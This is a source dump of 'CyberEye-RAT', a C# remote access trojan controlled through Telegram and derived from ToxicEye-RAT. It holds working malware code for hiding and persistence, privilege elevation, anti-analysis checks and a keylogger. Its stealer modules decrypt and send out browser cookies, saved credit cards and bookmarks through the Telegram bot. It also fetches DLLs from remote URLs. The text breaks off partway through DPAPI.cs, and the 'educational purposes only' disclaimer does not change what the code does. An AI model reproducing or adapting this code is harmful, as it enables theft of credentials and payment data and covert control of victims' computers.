{052597A3-D8B3-470E-BA24-E782333DC7F6}.Debug|x64.Build.0 = Debug|Any CPU 36 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Debug|x86.ActiveCfg = Debug|Any CPU 37 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Debug|x86.Build.0 = Debug|Any CPU 38 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Release|Any CPU.ActiveCfg = Release|Any CPU 39 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Release|Any CPU.Build.0 = Release|Any CPU 40 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Release|x64.ActiveCfg = Release|Any CPU 41 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Release|x64.Build.0 = Release|Any CPU 42 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Release|x86.ActiveCfg = Release|Any CPU 43 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Release|x86.Build.0 = Release|Any CPU 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {83D0992A-DAC3-4D1E-BEF4-B2EB9747D6AB} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /TelegramRAT/Program.cs: -------------------------------------------------------------------------------- 1 | /* 2 | * Original Version 3 | 4 | ^ Author : LimerBoy 5 | ^ Name : ToxicEye-RAT 6 | ^ Github : https://github.com/LimerBoy 7 | 8 | * Modded Version 9 | 10 | ^ Author : Cisamu 11 | ^ Name : CyberEye-RAT 12 | ^ Github : https://github.com/cisamu123 13 | > This program is distributed for educational purposes only. 14 | */ 15 | 16 | using System; 17 | 18 | namespace TelegramRAT 19 | { 20 | class Program 21 | { 22 | [STAThreadAttribute] 23 | static void Main(string[] args) 24 | { 25 | //Console.ReadLine(); 26 | //Environment.Exit(1); 27 | 28 | // Hide console 29 | persistence.HideConsoleWindow(); 30 | // Mutex check 31 | persistence.CheckMutex(); 32 | // SSL 33 | System.Net.ServicePointManager.SecurityProtocol = System.Net.SecurityProtocolType.Ssl3 | System.Net.SecurityProtocolType.Tls | System.Net.SecurityProtocolType.Tls11 | System.Net.SecurityProtocolType.Tls12; 34 | // Get admin rights 35 | persistence.elevatePrevileges(); 36 | // Delay before starting 37 | persistence.Sleep(); 38 | // Check if on VirtualBox, Sandbox or Debugger 39 | persistence.runAntiAnalysis(); 40 | // Install to system & hide directory 41 | persistence.installSelf(); 42 | // Add to startup 43 | persistence.setAutorun(); 44 | // Delete file after first start 45 | persistence.MeltFile(); 46 | // Check internet connection 47 | utils.isConnectedToInternet(); 48 | // Check for blocked process 49 | persistence.processCheckerThread.Start(); 50 | // Start offline keylogger 51 | utils.keyloggerThread.Start(); 52 | // Steal all passwords & data on first start 53 | AutoStealer.AutoStealerThread.Start(); 54 | // Start clipper 55 | Clipper.Run(); 56 | // Protect process (BSOD) 57 | persistence.protectProcess(); 58 | persistence.PreventSleep(); 59 | // Send 'online' to telegram bot 60 | telegram.sendConnection(); 61 | // Wait for new commands 62 | telegram.waitCommandsThread.Start(); 63 | // Need for system power events 64 | var shutdownForm = new persistence.MainForm(); 65 | System.Windows.Forms.Application.Run(shutdownForm); 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /TelegramRAT/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | /* 2 | * Original Version 3 | 4 | ^ Author : LimerBoy 5 | ^ Name : ToxicEye-RAT 6 | ^ Github : https://github.com/LimerBoy 7 | 8 | * Modded Version 9 | 10 | ^ Author : Cisamu 11 | ^ Name : CyberEye-RAT 12 | ^ Github : https://github.com/cisamu123 13 | > This program is distributed for educational purposes only. 14 | */ 15 | 16 | using System.Reflection; 17 | using System.Runtime.CompilerServices; 18 | using System.Runtime.InteropServices; 19 | using TelegramRAT; 20 | 21 | // Общие сведения об этой сборке предоставляются следующим набором 22 | // набора атрибутов. Измените значения этих атрибутов для изменения сведений, 23 | // связанные с этой сборкой. 24 | [assembly: AssemblyTitle(config.AssemblyTitle)] 25 | [assembly: AssemblyDescription(config.AssemblyDescription)] 26 | [assembly: AssemblyConfiguration(config.AssemblyConfiguration)] 27 | [assembly: AssemblyCompany(config.AssemblyCompany)] 28 | [assembly: AssemblyProduct(config.AssemblyProduct)] 29 | [assembly: AssemblyCopyright(config.AssemblyCopyright)] 30 | [assembly: AssemblyTrademark(config.AssemblyTrademark)] 31 | //[assembly: AssemblyCulture(config.AssemblyCulture)] 32 | // Установка значения False для параметра ComVisible делает типы в этой сборке невидимыми 33 | // для компонентов COM. Если необходимо обратиться к типу в этой сборке через 34 | // из модели COM задайте для атрибута ComVisible этого типа значение true. 35 | [assembly: ComVisible(false)] 36 | 37 | // Следующий GUID представляет идентификатор typelib, если этот проект доступен из модели COM 38 | [assembly: Guid("1bcfe538-14f4-4beb-9a3f-3f9472794902")] 39 | 40 | // Сведения о версии сборки состоят из указанных ниже четырех значений: 41 | // 42 | // Основной номер версии 43 | // Дополнительный номер версии 44 | // Номер сборки 45 | // Номер редакции 46 | // 47 | // Можно задать все значения или принять номера сборки и редакции по умолчанию 48 | // используя "*", как показано ниже: 49 | // [assembly: AssemblyVersion("1.0.*")] 50 | [assembly: AssemblyVersion(config.AssemblyVersion)] 51 | [assembly: AssemblyFileVersion(config.AssemblyFileVersion)] 52 | -------------------------------------------------------------------------------- /TelegramRAT/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace TelegramRAT.Properties { 12 | using System; 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resources() { 33 | } 34 | 35 | /// 36 | /// Returns the cached ResourceManager instance used by this class. 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | internal static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("TelegramRAT.Properties.Resources", typeof(Resources).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// Overrides the current thread's CurrentUICulture property for all 51 | /// resource lookups using this strongly typed resource class. 52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | internal static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /TelegramRAT/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /TelegramRAT/TelegramRAT.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902} 8 | Exe 9 | TelegramRAT 10 | TelegramRAT 11 | v4.8 12 | 512 13 | true 14 | 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | false 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | false 36 | 37 | 38 | 39 | 40 | 41 | 42 | core\libs\AudioSwitcher.AudioApi.dll 43 | 44 | 45 | core\libs\AudioSwitcher.AudioApi.CoreAudio.dll 46 | 47 | 48 | core\libs\Sodium.dll 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | True 102 | True 103 | Resources.resx 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | ResXFileCodeGenerator 113 | Resources.Designer.cs 114 | 115 | 116 | 117 | 118 | -------------------------------------------------------------------------------- /TelegramRAT/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /TelegramRAT/config.cs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/config.cs -------------------------------------------------------------------------------- /TelegramRAT/core/core.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | 10 | using System; 11 | using System.IO; 12 | using System.Net; 13 | 14 | namespace TelegramRAT 15 | { 16 | internal sealed class core 17 | { 18 | // Load dll 19 | public static void LoadRemoteLibrary(string url) 20 | { 21 | if (!File.Exists(Path.GetFileName(url))) 22 | { 23 | try 24 | { 25 | WebClient client = new WebClient(); 26 | client.DownloadFile(url, Path.GetFileName(url)); 27 | } 28 | catch (WebException) 29 | { 30 | Console.Write("[!] Failed load libraries, not connected to internet!"); 31 | persistence.unprotectProcess(); 32 | Environment.Exit(1); 33 | } 34 | } 35 | } 36 | 37 | 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /TelegramRAT/core/libs/7zr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/7zr.exe -------------------------------------------------------------------------------- /TelegramRAT/core/libs/AudioSwitcher.AudioApi.CoreAudio.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/AudioSwitcher.AudioApi.CoreAudio.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/AudioSwitcher.AudioApi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/AudioSwitcher.AudioApi.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/BugReport.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/BugReport.exe -------------------------------------------------------------------------------- /TelegramRAT/core/libs/Sodium.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/Sodium.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/libsodium-64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/libsodium-64.dll -------------------------------------------------------------------------------- /TelegramRAT/core/libs/libsodium.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/TelegramRAT/core/libs/libsodium.dll -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/AutoStealer.cs: -------------------------------------------------------------------------------- 1 | using System.IO; 2 | using System.Threading; 3 | using System.Collections.Generic; 4 | 5 | namespace TelegramRAT 6 | { 7 | internal class AutoStealer 8 | { 9 | // Thread 10 | public static Thread AutoStealerThread = new Thread(steal); 11 | private static string lockfile = Path.GetDirectoryName(config.InstallPath) + "\\autosteal.lock"; 12 | 13 | // Check dll's before decryption chromium passwords 14 | public static void loadDlls() 15 | { 16 | core.LoadRemoteLibrary("https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll"); 17 | core.LoadRemoteLibrary("https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll"); 18 | core.LoadRemoteLibrary("https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll"); 19 | } 20 | 21 | // Steal 22 | private static void steal() 23 | { 24 | // If disabled in config 25 | if(!config.AutoStealerEnabled) 26 | return; 27 | 28 | // Only on first start 29 | if (File.Exists(lockfile)) 30 | return; 31 | 32 | // Create lockfile if not exists 33 | File.Create(lockfile); 34 | // Threads list 35 | List threads = new List { 36 | // Screenshot 37 | new Thread(() => utils.desktopScreenshot(0)), 38 | // Steal all data from browsers 39 | new Thread(Passwords.get), 40 | new Thread(CreditCards.get), 41 | new Thread(History.get), 42 | new Thread(Bookmarks.get), 43 | new Thread(Cookies.get), 44 | // Steal other data from apps 45 | new Thread(FileZilla.get), 46 | new Thread(TelegramGrabber.get), 47 | new Thread(DiscordGrabber.get), 48 | new Thread(SteamGrabber.get), 49 | // Steal desktop documents 50 | new Thread(GrabDesktop.get) 51 | }; 52 | 53 | // Info 54 | telegram.sendText("🌹 Starting autostealer..."); 55 | // Start stealer threads 56 | foreach(Thread thread in threads) 57 | { 58 | thread.Start(); 59 | } 60 | // Wait 20 seconds 61 | Thread.Sleep(20 * 1000); 62 | // Info 63 | telegram.sendText("🥀 Stopping autostealer..."); 64 | // Stop stealer threads 65 | foreach (Thread thread in threads) 66 | { 67 | if(thread.IsAlive) 68 | { 69 | try 70 | { 71 | thread.Abort(); 72 | } 73 | catch { } 74 | } 75 | } 76 | 77 | 78 | 79 | 80 | } 81 | 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Bookmarks.cs: -------------------------------------------------------------------------------- 1 | /* 2 | * Original Version 3 | 4 | ^ Author : LimerBoy 5 | ^ Name : ToxicEye-RAT 6 | ^ Github : https://github.com/LimerBoy 7 | 8 | * Modded Version 9 | 10 | ^ Author : Cisamu 11 | ^ Name : CyberEye-RAT 12 | ^ Github : https://github.com/cisamu123 13 | > This program is distributed for educational purposes only. 14 | */ 15 | 16 | using System; 17 | using System.IO; 18 | 19 | namespace TelegramRAT 20 | { 21 | internal class Bookmarks 22 | { 23 | public static void get() 24 | { 25 | // Path info 26 | string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; 27 | string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\"; 28 | string u_s = "\\User Data\\Default\\Bookmarks"; 29 | // Browsers list 30 | string[] chromiumBasedBrowsers = new string[] 31 | { 32 | l_a + "Google\\Chrome" + u_s, 33 | l_a + "Google(x86)\\Chrome" + u_s, 34 | l_a + "Chromium" + u_s, 35 | a_a + "Opera Software\\Opera Stable\\Bookmarks", 36 | l_a + "BraveSoftware\\Brave-Browser" + u_s, 37 | l_a + "Epic Privacy Browser" + u_s, 38 | l_a + "Amigo" + u_s, 39 | l_a + "Vivaldi" + u_s, 40 | l_a + "Orbitum" + u_s, 41 | l_a + "Mail.Ru\\Atom" + u_s, 42 | l_a + "Kometa" + u_s, 43 | l_a + "Comodo\\Dragon" + u_s, 44 | l_a + "Torch" + u_s, 45 | l_a + "Comodo" + u_s, 46 | l_a + "Slimjet" + u_s, 47 | l_a + "360Browser\\Browser" + u_s, 48 | l_a + "Maxthon3" + u_s, 49 | l_a + "K-Melon" + u_s, 50 | l_a + "Sputnik\\Sputnik" + u_s, 51 | l_a + "Nichrome" + u_s, 52 | l_a + "CocCoc\\Browser" + u_s, 53 | l_a + "uCozMedia\\Uran" + u_s, 54 | l_a + "Chromodo" + u_s, 55 | l_a + "Yandex\\YandexBrowser" + u_s 56 | }; 57 | 58 | // Data 59 | string filename = "bookmarks.txt"; 60 | string output = "[BOOKMARKS]\n\n"; 61 | 62 | // Search all browsers 63 | foreach (string browser in chromiumBasedBrowsers) 64 | { 65 | if (!File.Exists(browser)) { 66 | continue; 67 | } 68 | 69 | 70 | string bookmarksFile = File.ReadAllText(browser); 71 | foreach (SimpleJSON.JSONNode mark in SimpleJSON.JSON.Parse(bookmarksFile)["roots"]["bookmark_bar"]["children"]) 72 | { 73 | output += "URL: " + mark["url"] + "\n" 74 | + "NAME: " + mark["name"] + "\n" 75 | + "DATE: " + Convert.ToString(TimeZoneInfo.ConvertTimeFromUtc(DateTime.FromFileTimeUtc(10 * Convert.ToInt64((string)mark["date_added"])), TimeZoneInfo.Local)) + "\n" 76 | + "\n"; 77 | } 78 | continue; 79 | } 80 | // Send 81 | File.WriteAllText(filename, output); 82 | telegram.UploadFile(filename, true); 83 | } 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Cookies.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | 12 | namespace TelegramRAT 13 | { 14 | internal class Cookies 15 | { 16 | 17 | public static void get() 18 | { 19 | // loadDlls 20 | AutoStealer.loadDlls(); 21 | // Path info 22 | string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; 23 | string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\"; 24 | string u_s = "\\User Data\\Default\\Cookies"; 25 | // Browsers list 26 | string[] chromiumBasedBrowsers = new string[] 27 | { 28 | l_a + "Google\\Chrome" + u_s, 29 | l_a + "Google(x86)\\Chrome" + u_s, 30 | l_a + "Chromium" + u_s, 31 | a_a + "Opera Software\\Opera Stable\\Cookies", 32 | l_a + "BraveSoftware\\Brave-Browser" + u_s, 33 | l_a + "Epic Privacy Browser" + u_s, 34 | l_a + "Amigo" + u_s, 35 | l_a + "Vivaldi" + u_s, 36 | l_a + "Orbitum" + u_s, 37 | l_a + "Mail.Ru\\Atom" + u_s, 38 | l_a + "Kometa" + u_s, 39 | l_a + "Comodo\\Dragon" + u_s, 40 | l_a + "Torch" + u_s, 41 | l_a + "Comodo" + u_s, 42 | l_a + "Slimjet" + u_s, 43 | l_a + "360Browser\\Browser" + u_s, 44 | l_a + "Maxthon3" + u_s, 45 | l_a + "K-Melon" + u_s, 46 | l_a + "Sputnik\\Sputnik" + u_s, 47 | l_a + "Nichrome" + u_s, 48 | l_a + "CocCoc\\Browser" + u_s, 49 | l_a + "uCozMedia\\Uran" + u_s, 50 | l_a + "Chromodo" + u_s, 51 | l_a + "Yandex\\YandexBrowser" + u_s 52 | }; 53 | 54 | // Database 55 | string tempCookieLocation = ""; 56 | string filename = "cookies.txt"; 57 | string output = "[COOKIES]\n\n"; 58 | 59 | // Search all browsers 60 | foreach (string browser in chromiumBasedBrowsers) 61 | { 62 | if (File.Exists(browser)) 63 | { 64 | tempCookieLocation = Environment.GetEnvironmentVariable("temp") + "\\browserCookies"; 65 | if (File.Exists(tempCookieLocation)) 66 | { 67 | File.Delete(tempCookieLocation); 68 | } 69 | File.Copy(browser, tempCookieLocation); 70 | } 71 | else 72 | { 73 | continue; 74 | } 75 | 76 | // Read chrome database 77 | cSQLite sSQLite = new cSQLite(tempCookieLocation); 78 | sSQLite.ReadTable("cookies"); 79 | 80 | for (int i = 0; i < sSQLite.GetRowCount(); i++) 81 | { 82 | // Get data from database 83 | string value = sSQLite.GetValue(i, 12); 84 | string hostKey = sSQLite.GetValue(i, 1); 85 | string name = sSQLite.GetValue(i, 2); 86 | string path = sSQLite.GetValue(i, 4); 87 | string expires = Convert.ToString(TimeZoneInfo.ConvertTimeFromUtc(DateTime.FromFileTimeUtc(10 * Convert.ToInt64(sSQLite.GetValue(i, 5))), TimeZoneInfo.Local)); 88 | string isSecure = sSQLite.GetValue(i, 6).ToUpper(); 89 | 90 | 91 | // If no data => break 92 | if (string.IsNullOrEmpty(name)) 93 | { 94 | break; 95 | } 96 | // Add 97 | output += "VALUE: " + Crypt.toUTF8(Crypt.decryptChrome(value, browser)) + "\n" 98 | + "HOST: " + hostKey + "\n" 99 | + "NAME: " + Crypt.toUTF8(name) + "\n" 100 | + "PATH: " + path + "\n" 101 | + "EXPIRE: " + expires + "\n" 102 | + "SECURE: " + isSecure + "\n" 103 | + "\n"; 104 | 105 | continue; 106 | } 107 | continue; 108 | } 109 | // Send 110 | File.WriteAllText(filename, output); 111 | telegram.UploadFile(filename, true); 112 | } 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/CreditCards.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | 12 | namespace TelegramRAT 13 | { 14 | internal class CreditCards 15 | { 16 | 17 | public static void get() 18 | { 19 | // loadDlls 20 | AutoStealer.loadDlls(); 21 | // Path info 22 | string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; 23 | string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\"; 24 | string u_s = "\\User Data\\Default\\Web data"; 25 | // Browsers list 26 | string[] chromiumBasedBrowsers = new string[] 27 | { 28 | l_a + "Google\\Chrome" + u_s, 29 | l_a + "Google(x86)\\Chrome" + u_s, 30 | l_a + "Chromium" + u_s, 31 | a_a + "Opera Software\\Opera Stable\\Web Data", 32 | l_a + "BraveSoftware\\Brave-Browser" + u_s, 33 | l_a + "Epic Privacy Browser" + u_s, 34 | l_a + "Amigo" + u_s, 35 | l_a + "Vivaldi" + u_s, 36 | l_a + "Orbitum" + u_s, 37 | l_a + "Mail.Ru\\Atom" + u_s, 38 | l_a + "Kometa" + u_s, 39 | l_a + "Comodo\\Dragon" + u_s, 40 | l_a + "Torch" + u_s, 41 | l_a + "Comodo" + u_s, 42 | l_a + "Slimjet" + u_s, 43 | l_a + "360Browser\\Browser" + u_s, 44 | l_a + "Maxthon3" + u_s, 45 | l_a + "K-Melon" + u_s, 46 | l_a + "Sputnik\\Sputnik" + u_s, 47 | l_a + "Nichrome" + u_s, 48 | l_a + "CocCoc\\Browser" + u_s, 49 | l_a + "uCozMedia\\Uran" + u_s, 50 | l_a + "Chromodo" + u_s, 51 | l_a + "Yandex\\YandexBrowser" + u_s 52 | }; 53 | 54 | // Database 55 | string tempCCLocation = ""; 56 | string filename = "credit_cards.txt"; 57 | string output = "[CREDIT CARDS]\n\n"; 58 | 59 | // Search all browsers 60 | foreach (string browser in chromiumBasedBrowsers) 61 | { 62 | if (File.Exists(browser)) 63 | { 64 | tempCCLocation = Environment.GetEnvironmentVariable("temp") + "\\browserCreditCards"; 65 | if (File.Exists(tempCCLocation)) 66 | { 67 | File.Delete(tempCCLocation); 68 | } 69 | File.Copy(browser, tempCCLocation); 70 | } else { 71 | continue; 72 | } 73 | 74 | // Read chrome database 75 | cSQLite sSQLite = new cSQLite(tempCCLocation); 76 | sSQLite.ReadTable("credit_cards"); 77 | 78 | for (int i = 0; i < sSQLite.GetRowCount(); i++) 79 | { 80 | // Get data from database 81 | string number = sSQLite.GetValue(i, 4); 82 | string expYear = sSQLite.GetValue(i, 3); 83 | string expMonth = sSQLite.GetValue(i, 2); 84 | string name = sSQLite.GetValue(i, 1); 85 | 86 | // If no data => break 87 | if (string.IsNullOrEmpty(number)) 88 | { 89 | break; 90 | } 91 | 92 | // Add 93 | output += "NUMBER: " + Crypt.decryptChrome(number, browser) + "\n" 94 | + "NAME: " + Crypt.toUTF8(name) + "\n" 95 | + "EXPIRE_YEAR: " + expYear + "\n" 96 | + "EXPIRE_MONTH: " + expMonth + "\n" 97 | + "\n"; 98 | continue; 99 | } 100 | continue; 101 | } 102 | // Send 103 | File.WriteAllText(filename, output); 104 | telegram.UploadFile(filename, true); 105 | } 106 | } 107 | } 108 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Crypt.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | using System.Linq; 12 | using System.Text; 13 | 14 | namespace TelegramRAT 15 | { 16 | internal class Crypt 17 | { 18 | 19 | // Decrypt value from Chrome > 80 version. 20 | public static string decryptChrome(string password, string browser = "") 21 | { 22 | // If Chromium version > 80 23 | if (password.StartsWith("v10") || password.StartsWith("v11")) 24 | { 25 | // Get masterkey location 26 | string masterKey, masterKeyPath = ""; 27 | foreach (string l_s in new string[] { "", "\\..", "\\..\\.." }) 28 | { 29 | masterKeyPath = Path.GetDirectoryName(browser) + l_s + "\\Local State"; 30 | if (File.Exists(masterKeyPath)) 31 | { 32 | break; 33 | } 34 | else 35 | { 36 | masterKeyPath = null; 37 | continue; 38 | } 39 | } 40 | // Get master key 41 | masterKey = File.ReadAllText(masterKeyPath); 42 | masterKey = SimpleJSON.JSON.Parse(masterKey)["os_crypt"]["encrypted_key"]; 43 | // Decrypt master key 44 | byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(masterKey)).Remove(0, 5)); 45 | byte[] masterKeyBytes = DPAPI.Decrypt(keyBytes, null, out string _); 46 | byte[] bytePassword = Encoding.Default.GetBytes(password).ToArray(); 47 | // Decrypt password by master-key 48 | try { 49 | byte[] iv = bytePassword.Skip(3).Take(12).ToArray(); // From 3 to 15 50 | byte[] payload = bytePassword.Skip(15).ToArray(); // from 15 to end 51 | string decryptedPassword = Encoding.Default.GetString(Sodium.SecretAeadAes.Decrypt(payload, iv, masterKeyBytes)); 52 | return decryptedPassword; 53 | } 54 | catch { return "failed (AES-GCM)"; } 55 | 56 | // return decryptedPassword; 57 | } else { 58 | try { 59 | return Encoding.Default.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(password), null, out string _)); ; 60 | } catch { return "failed (DPAPI)"; } 61 | } 62 | } 63 | 64 | // Convert 1251 to UTF8 65 | public static string toUTF8(string text) 66 | { 67 | Encoding utf8 = Encoding.GetEncoding("UTF-8"); 68 | Encoding win1251 = Encoding.GetEncoding("Windows-1251"); 69 | 70 | byte[] utf8Bytes = win1251.GetBytes(text); 71 | byte[] win1251Bytes = Encoding.Convert(utf8, win1251, utf8Bytes); 72 | 73 | return win1251.GetString(win1251Bytes); 74 | } 75 | 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/DPAPI.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.Text; 11 | using System.Runtime.InteropServices; 12 | using System.ComponentModel; 13 | 14 | // Decrypt data using DPAPI functions. 15 | namespace TelegramRAT 16 | { 17 | internal class DPAPI 18 | { 19 | // Wrapper for DPAPI CryptUnprotectData function. 20 | [DllImport("crypt32.dll", 21 | SetLastError = true, 22 | CharSet = CharSet.Auto)] 23 | private static extern 24 | bool CryptUnprotectData(ref DATA_BLOB pCipherText, 25 | ref string pszDescription, 26 | ref DATA_BLOB pEntropy, 27 | IntPtr pReserved, 28 | ref CRYPTPROTECT_PROMPTSTRUCT pPrompt, 29 | int dwFlags, 30 | ref DATA_BLOB pPlainText); 31 | 32 | // BLOB structure used to pass data to DPAPI functions. 33 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 34 | internal struct DATA_BLOB 35 | { 36 | public int cbData; 37 | public IntPtr pbData; 38 | } 39 | 40 | // Prompt structure to be used for required parameters. 41 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 42 | internal struct CRYPTPROTECT_PROMPTSTRUCT 43 | { 44 | public int cbSize; 45 | public int dwPromptFlags; 46 | public IntPtr 